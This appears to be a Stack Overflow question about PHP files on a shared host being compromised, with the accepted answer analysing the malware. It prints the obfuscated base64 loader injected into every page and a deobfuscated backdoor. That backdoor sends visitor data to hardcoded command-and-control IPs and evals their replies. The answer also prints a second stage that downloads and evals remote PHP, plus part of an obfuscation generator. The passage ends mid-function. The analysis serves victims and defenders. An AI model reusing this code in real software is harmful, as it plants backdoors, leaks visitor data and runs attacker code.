# Is my website possibly being hacked?

Tags: php, security, hosting

I might be insane to write this here, but I am just too scared as of now.
There are 2 websites that I have hosted on iPage.

**All the PHP pages across both my websites were modified early this morning around 9AM and all of them have the following prefix**

```
<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZFJlbHBFVGsxaGJYTXhWMWN4YzAxSFRqVk9WM0JwVFdwQ2NGUjZUa3RpUjFKSlZtNXNhV0ZWUm5KWmJHTTFUVWRHU0ZadWJGQk5la1l5VjFkM05XVnRVa2hTYm14clVUSmtjRmxxVGtOaFIwcDBaRWhDU21GWGN6TlhiVFZYWkZacmVsVnVRbWxOYWxKdVYxWmtiMkpYVWxoVmJURnBVakZ2TWxkclpHOWlWMFpKVkZjNVMxTkZTbTlUTVdoNllUSktXRkp1VWxwVk1FVTFVMVZXYTJKSFVrWk5WMmhwVmpCV2RsTXhVbnBoTVhCMFlraE9ZVlV3UlRWVFZXaFhaVmRLU0ZadVZscE5hbXh5VjJ4T2IxcHNaM2RYYTNCVlVsWmFiVmRJYkhKT01rWllWMWRrVEZJeWVEWlpla3BYVFVWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVFtOVZSbFY0VlZkc1dWVXlkSGRhV0d4VFlqSkplbFJxUWtwU1JFSnVVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhkRzlXVmxwSFVXMWFWRkpVYkZWV2EwNUxXa1U0ZWsxSFpHRldNMmcyVjJ4T1EwNHdjRWhoU0ZwcVRURkdibFZHVGtKaFZXeHhaRVJzYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3VkZWc1ZYaFZSbHBHVm0xYVVsWldTa1pXVjJ4TFdrVjBWR0pFWkV0U01uZ3pVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4elUydGFWVlpVYkZaVmJGazFVV3hLUmxWc1RrcGlSRUV6V214T1EySkhTa2xVYlhoS1UwaE9jbGxXYUVKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFRWbHBIVld4R1dVMVZjRWRWYlhSWFZURktWMU5YYkZsVk1uUjNXbGhzVTJWV2NGaFhWMlJSVlRCSmVGa3lNVFJpUjBwMFZHNWFZVkl4Vm5aVGExazFWa1pLVjFOc1pGTldhM0JwVTFkMGIxWldXa2RSYlZwV1lURmFTRlZzV2t0U2JGWndVMjFTVEZaSVVUVlRWV1JYWXpKTmVWWlhaR3hsVmtvMVYyeGtXbG94UWxSUlYyeEtZVzVSTlZsV1pGcGFNSFJJWWtod2FrMXNXWGRUTUU1VFdteFZkMVpzVGxkaE1WcFVWak5zUzFOV1drZFZiRVpaVFZaYVZWVnNXa3RhYkVaV1drVmFWV0pHUm5CWFJrNXlZMGRXTlZWcVJscFZNRVUxVTFWb1YyVlhTa2hXYmxaYVRXcHNjbGRzVG05bGJWSkpVMnBDYVUxdWFESmFSRXBYWlZWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVJsZFdSa3BYVTIxYVVsWlhVa2RXUjNoU1lWWm9WR0V6UWxCTmVrSnVWMnhrTkdWc2NGUlJhbVJMVTBaYWIxTlZVWGRhTUd4d1UxUmtiVll5ZUhSVFZVNXZZMGROZWxSdGVHdFJNbVJ5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlpXV2xkU2JGWnpZa2RhVmsxV1NsUlZNVlV4VTBWc2MwMUlRa3hYU0U1eVdURm9UbG94UWxSUmFrWnFZbGhvYzFsdE1VOWtiSEJJVmxjNVMxSnFiRlZWYkZwTFZqRktWMU50U2twaVJWcFhWV3hhUzFkc1ozaFViRlpXWVRKNFVGVnViRXRhUlhSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdWFHcGxWVVUxVTFWT1NtRlZPSHBOUjNSclYwVndlbGRJY0VKYU1VSlVVVmRzYUZOR1NYZFpNRkoyWkd0NE5WTlhaRTFoVlVaeVdUQmtSazR3Y0VsV2JteHBVbXBvTkZOVlVYZGFNR3h3VDFoR1lWWXhTbmRVUnpWRFlqSk9SVTlVU21GWFJYQTJXVlpqTldSV1FsVlJWRlpRVmtWV2RGbHNZelZOUjBaSVZtNXNVVlV3Ykc1VVIyeFRaRVpzV0UxWGFFcFJlbEp1VTFkc1lXSlhSbGhsUjNoUlZUQnNibFJIYkVKaE1YQjBZa2hPWVZVd1JqRlRWVTVLWWxkR1NFOVljR3RTUkVKd1UxVk5NRm93Y0VoaFNGcHFUVEZHYmxSSGJFSmhWWEIwWWtoa1VWVXdiRzVVUjJ4Q1lUSkdXVkZYWkUxaFZVWndVMjAxUzJKR2NIRk5SMnhLVVhwU2JsTnJhRXRpUm5Cd1VWaFdTbEV3YkhSYVJtUkdUMVZzY0ZGWVZrdFRSbHB2VTFWTk1Gb3diSEJYYm1ocVpXcENjRk5WVFRCYU1IQkpVbTV3VUdWV1NYZFpNalZ5V2pGQ1ZGRnFRbXBpYkZwelZIcEtjMkpWZEVSUmJURnJWbnBXY1ZwRlpITmtiVXB6VDFkNGJGSXllRFphUldoT1lqQnNkRlJxUm1waVdHaHRXVlpqTVdOSFVrUlRXRUpLVVRKM00xTnJaRTlpTUd4RlRVZGtXazB4V2pWWmExazFZMGRLZEdKRVFreFJNVWw0V1RJeE5GcHJNVVJSV0ZaS1VURkplRmt5TVRSYWF6RlVZWHBrV2sweFdqVlphMWsxWld4d1dWVnVXbXBUUmtaMlUydGtUMkl3ZUVSUmExSlhWbXR3VGxaRVJrTldWbWQ0VTJ0YVYxSnNXbFJXUjNoVFZURkdWazVXVWxOaE1WcFVWRVZPUW1WRmRGVmtSM0JyVjBWd2VsZEVUazlpUjFKSVQxaGthMUV5WkhKWFZFcHVZekJzUmxSc1dsWmhNMmhSVmxWYVUxcHNXa1ppUlRWVFZsUnNWMVpyVGpOYU1ERTFZWHBrUzFOR1ducGFSVTVDVDFWc1NWVnViR2hXZWtKMlYxUk9WMlZYU2tkUFYzaHNVakZhY1ZNd1RsTmhiVVpFWVROQ1VHVldTWGRaTWpWeVdqRkNWRkZ0TVZwV00yZzJWMnhTTUU5VmJFaGlSekZLVVRKa2RsbFdZekZqUm1kNVdrZDRhMUV5WkhCWFZtUTBZekpKZWxwSFdtdFhSWEI2VjBSS1lXUnRUa2hXYmxaS1lWZDBkMU5WVGxwaVZXeEVWV3BDYW1KdGRIZFRWV2g2WVRKU1dHVkVRa3BTUkVKdVdrVm9TMk5IU2xSaFJVWmhZbGQ0ZWxkc1dUVmliSEJaVlcxYVdrMXFiREZhUldSWFpGZFNTVlJYT1V0VFJsbzFXV3RaTkdRd2JFUk9SMlJMVTBaYU5WbHJXVFJsUlhSVVlYcGtTMU5HU2pWYVZrNUNUMVZzU0ZkdGFHbFRSVFZ6VkhwTmVHTkdjSEJhTW5SclUwVnZNVk14YUhwaE1YQjFVVmRrVVZVd1NuUlpla2sxWVcxRmVVOVlaR0ZXZWxKMlUydG9RMkZGZUVSUlZGSk9VVE5rYmxOclpGZGxWMDUwVGxoYVRWRXdSbkpYYkdoTFpWZE5lbFZ1YkUxUk1FWTJWRlZPY2s0eVJsaFhWMlJNVVRGS2RGa3dUbkphTWxZMVZXNWFhMWRHUm01VlJrNUNZVlpKZDFac1ZrcFJNVWw0V1RJeE5GcHJNVlJSYTJ4WFVteEtVbFJJY0Vaa1ZURkhaVWhzV1ZKNlVuQlVNMnhUWkcxU1dWVlhaRTFoYWtKdVUxZDBiMlJ0VFhwVlZGcEtVVEZLTTFkV1dqUmxWbWhJVGtkc1VHVldTakphUm1oU1dqQjRjVTFIWkVwaE1EVXlXVzB3TVdKR2EzcFZia0pwVFdwUk1sTlZWazlqTWtsNlZHMTRXVk5GY0dwWmJYZzBaVlpvU0U1SGJGQk5iRzk2V1RJeGMwMUdjRlJhTW5SaFltdEdlbE5WVGxOa2JWSlpWVmhDVUdWV1NqVlhiR2hTV2pGQ1ZGRlhiRXBoYmxGNldWVmtjMk14Y0ZSUlZ6bEtWakZ3YzFscVNscGlNSEJJVjI1a1RGVXlkRzVhV0d4VFpWWndXVlZYWkVwUmVsRTFVMVZPUTJKV2IzbFdha0pxWlZka2NsZHROVUpqTUd4RlVsaHNVRkV5Y3pOYWJHUmhZVzFLU0U5WWNHRlZNbVJ5VjIwMVFtTkZPVFZWYWtacFUwWkdibFZHVGtOTlIwNTBZa2hTVEZORk5IaFhWelZQVFVkT2NGb3lkR3BpVmxsM1ZFVk9RMlZ0VWtsVGJtUnBUVEF4ZGxOcmFFdGlSMUpFWkRKa1NtSklhRFZYUldNeFdUSk9jMlZJVmtwaFYzUnVVek5zUWsxRmRGUmhlbVJ0VjBSQ2JsTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4b1lXRkhTa1JUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCM1dUQm9UMk14YkZsVWJUbGhWMFV4ZGxsNlRsTmxWbWQ2VTIxNGFsSXphRzlYVkVwV1lqQnNkRlpxU2xwV00yUndWRVZPU21GVmVFUlZha1pwVTBaR2QxTXhVbnBhTVhCWlYyMW9hVkV5WkhKYVYyeHlUakJzU0ZacVVtaFhSa1oyVXpGU01FOVhSbGhYVjJSTVUwVTBkMWt5TlVOa2JVNDFXakowYTFZelozZFVSVTVMWWtac2RFNVhhRXBoVjNSdVUxWlJkMDlWYkVoWGJXaHBVMFUxYzFNeGFIcGhNV2Q0Vkd0YVZtSkdjRWRXVjNoNllWWnZlVTlZV21GUk1IQnJVMVZSZDFveVRYcFZibXhaVFRCd2Mxa3daRFJoUm10NVZsYzVTbUpXV25CWmJURkdZVlY0UkZOWGJFMVJNVWw0V1d0b1VtTkZPSHBUYlhoclUwWmFOVmx0YkVOTlIwNTFWbTE0VUUxNlJuTlphMmhQWWtWc1NXUkliR0ZYUmtsNFdUSXdNRm94Y0hSU2JrNXFUV3hWTTFwc1ozZGhNWEIwVW1wQ2FGSXhXalZVVjNnd1drVnNSVTFIWkVwaGJVMHdWRWR3VWsxcmVIRlNWRTVPWlZSU05GUnJUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cwVkc1d1dtUlZPVlJPU0d4T1ZrZGtNVlJXVW5KbFJXeHhZekowWVdKVldYZFpWV1JYWlZVeGMyUkhVa3BTUkVKdVUxZHdjbVZGZUhGVFdHeFFVWHBTTkZSc1VsSmtWVEZ4VmxSQ1NtRnVUbkpYYlRGSFRVZEdTRlp1YkU1aVNGSnJVMVZSZDFvd2JIRlplazVOWVcxa05GUkhjRXBOUlRGVVRraHNUMVpGTVhCVU0yeFRZbFpzV1ZWdE9XRlhSV3cxVm5wRmQxb3hRbFJSVjJ4T1ZrZGpkMVJIY0c1bFZYaHhVbGhvVDJWVVVqUlVWbEpDWVZVNU5WVnRNVnBYUmtwMlYyeG9TbVZXWTNoTlIyUlJWVEJHY0ZSclVscGtWVFZFVGtoc1RsSkZiREZVTVZKT1lWVTVOVlZ0TVZwWFJrcDJWMnhvU21WV1kzaE5SMlJSVlRCR2NGUnJVbHBrVlRGeFZWUldUV0ZzVlRCVVIzQkdaV3MxVkZOVVpFdFNNWEJ2V2tWa2IySkhUbkZUYlVwWlZUQkZOVk5WVGtwbFJUVTJWMWhXVUZWNlVqVlVhMUpHWkZVeFZWWllaRXBoYms1eVYyMHhSMDFIUmtoV2JteE9Za2hTYTFOVlVYZGFNR3h4VlZSS1RXRnJNSHBVUjNCR1RXczVWRTVFUms5aFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxUkNUMkZVVWpaVVZVMHdUVVV4VkU1RVZsQlZNR3N6VTJ0a1lXRkhVa2hoUjNocVlXdHdhVmRHVGtKUFZXeEVVMVJXVDFGNlVqVlVhMUpLWkZVeGNWWlVSazFoYXpCNFUxZHdlbUV4Y0hSU2FrSm9VakZhTlZSWGVEQmFSV3hGVFVka1NtRnJWWHBVTUUwd1pVVTFjVk5ZVms1V1JXc3hWRWR3U21WVk1UVlRWR1JMVWpGd2IxcEZaRzlpUjA1eFUyMUtXVlV3UlRWVFZVNUtUVEE1UkU1RVFrOWxWRkkwVkRCU1VtUlZNVFpVVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeE5sSllWazVXUjJOM1ZFZHdTbVZyTlVST1JGWlBZVlZyTTFsNlNtOU5WbkIwVjI1T1lWVXlaSEpYYlRGSFRVZEdTRlp1YkU1aFYzTXpWMjB3TldWV2NGaFNiWEJvVVRKa2NsZHRNVWROUjBaSVZtNXNUbUZWU205Wk0yeENZVEpTV1ZOWVFteE5iWGgwVTFWT2Jsb3hiRmhoUnpGclZqRktkRmxyWkdGT2JIQklZVWN4YUZORk1YWlRhMmhYWlZWMFZGRllRa3BUU0U1dVYxYzFTMkpHYkZoak1tUlFUWHBGTlZwc1JUbFFVMGx3UzFSelp5SXBLVHNnIikpOyA=";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>
```

I tried reaching iPage support and they have no idea as to what has happened. They just created a support ticket for me which will be looked into within 48 hours!!

**UPDATE**

**Got an email about the hack**

> From: poor victim hahahaha@gmail.com
>
> Message: Why is this code on my server? why are you hacking my
>   files??? this code points back to you!!! Prepare for a lawsuit
>
> if (!function_exists("GetMama")){  function mod_con($buf){ 
>   str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) {  $buf =
>   str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); return
>   $buf;  }str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) {  $buf =
>   str_ireplace("",stripslashes($_SERVER["good"])."",$buf); return $buf; 
>   }return $buf;  }function opanki($buf){  $gz_e = false;$h_l =
>   headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {  $gz_e
>   = true;  }if ($gz_e){  $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname,
>   "r");$contents = gzread($zd, 10000000);$contents =
>   mod_con($contents);gzclose($zd);unlink($tmpfname);$contents =
>   gzencode($contents);  } else {$contents = mod_con($buf);  }$len =
>   strlen($contents);header("Content-Length: ".$len);return($contents); 
>   } function GetMama(){  $mother = "www.99bits.com";return $mother; 
>   }ob_start("opanki");function ahfudflfzdhfhs($pa){  $mama =
>   GetMama();$file = urlencode(**FILE**);if
>   (isset($_SERVER["HTTP_HOST"])){  $host = $_SERVER["HTTP_HOST"];  }
>   else {$host = "";  }if (isset($_SERVER["REMOTE_ADDR"])){  $ip =
>   $_SERVER["REMOTE_ADDR"];  } else {$ip = "";  }if
>   (isset($_SERVER["HTTP_REFERER"])){  $ref =
>   urlencode($_SERVER["HTTP_REFERER"]);  } else {$ref = "";  }if
>   (isset($_SERVER["HTTP_USER_AGENT"])){  $ua =
>   urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));  } else {$ua = "";
>   }if (isset($_SERVER["QUERY_STRING"])){  $qs =
>   urlencode($_SERVER["QUERY_STRING"]);  } else {$qs = "";  }$url_0 =
>   "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama .
>   "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref .
>   "&ua=" .$ua . "&qs=" . $qs;$try = true;if(
>   function_exists("curl_init") ){  $ch = curl_init($url_0 .
>   $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch,
>   CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;  } if
>   ((ini_get("allow_url_fopen")) && $try) {  $ult =
>   trim(@file_get_contents($url_0 . $url_1));$try = false;  }if($try){ 
>   $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {  $out = "GET
>   $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection:
>   Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {  $ret
>   .= fgets($fp, 128);  }fclose($fp);$ult = trim(substr($ret,
>   strpos($ret, "\r\n\r\n") + 4));  }  } if (strpos($ult,"eval") !==
>   false){  $z = stripslashes(str_replace("eval","",$ult)); eval($z);
>   exit();  }if (strpos($ult,"ebna") !== false){  $_SERVER["good"] =
>   str_replace("ebna","",$ult);return true;  }else {return false;  } 
>   }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[]
>   = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] =
>   "46.249.58.135";$father2[] = "176.9.241.150";$father2[] =
>   "46.37.169.56";$father2[] = "46.30.41.99";$father2[] =
>   "94.242.255.35";$father2[] = "178.162.129.223";$father2[] =
>   "78.47.184.33";$father2[] =
>   "31.184.234.96";shuffle($father2);foreach($father2 as $ur){  if (
>   ahfudflfzdhfhs($ur) ) {  break ;  }  } }
>
> Sent from (ip address): 64.118.163.18 (64.118.163.18) Date/Time: April
>   9, 2012 7:15 pm Coming from (referer):
>   http://www.99bits.com/contact-us/ Using (user agent): Mozilla/5.0
>   (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like
>   Gecko) Chrome/18.0.1025.151 Safari/535.19

Thanks to each one of you for all the help and knowledge. For some strange and unknown reason my blog was the targeted in this hack attempt. I've closed the blog for time being, until I can clean up all the files (as all my PHP files are infected).

Comment: I would recommend changing all passwords, and taking down the website until you hear back from support / fix the vulnerability

Comment: How could this happen? All the php pages have a 644 permission! No-one except me can write on the files! And I didn't login at 9AM today..

Comment: @Rohan generally it could be the web hosting company with some sort of vulnerability.

Comment: Someone has serious access to your file system and possibly the whole server. Do what xbonez said.

Comment: Do you / your host run plesk? There is a rampant plesk known vulnerability issue.

Comment: I love when these hit SO. They are so much fun to dissect.

Answer (score 7, accepted):

In the current form the script has the following command-and-control servers ("c&c"):

```
$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";
```

The script randomizes the order of them on each run. Then it trys to send a GET request containing these variables

```
$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__
```

to the first c&c server, if the response does not contain `eval` or `ebna` (or the server is down) it trys the next c&c server and so on.

In case the c&c server returns: `ebna <somestring>`, `<somestring>` will be placed inside the body tag of your website. So the hacker can insert arbitrary html/js code.

In the other case where the c&c server returns `eval <somestring>`, `<somestring>` will be passed to eval(). That way the hacker can even execute arbitrary php code.

I managed to get the c&c server to return an eval response by just ommiting all url parameters, like this: `http://<server-ip>/jedi.php`, here is the response:

```
eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);
```

that loads and executes `http://2brewers.com/99.txt`, which looks like this:

```
function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
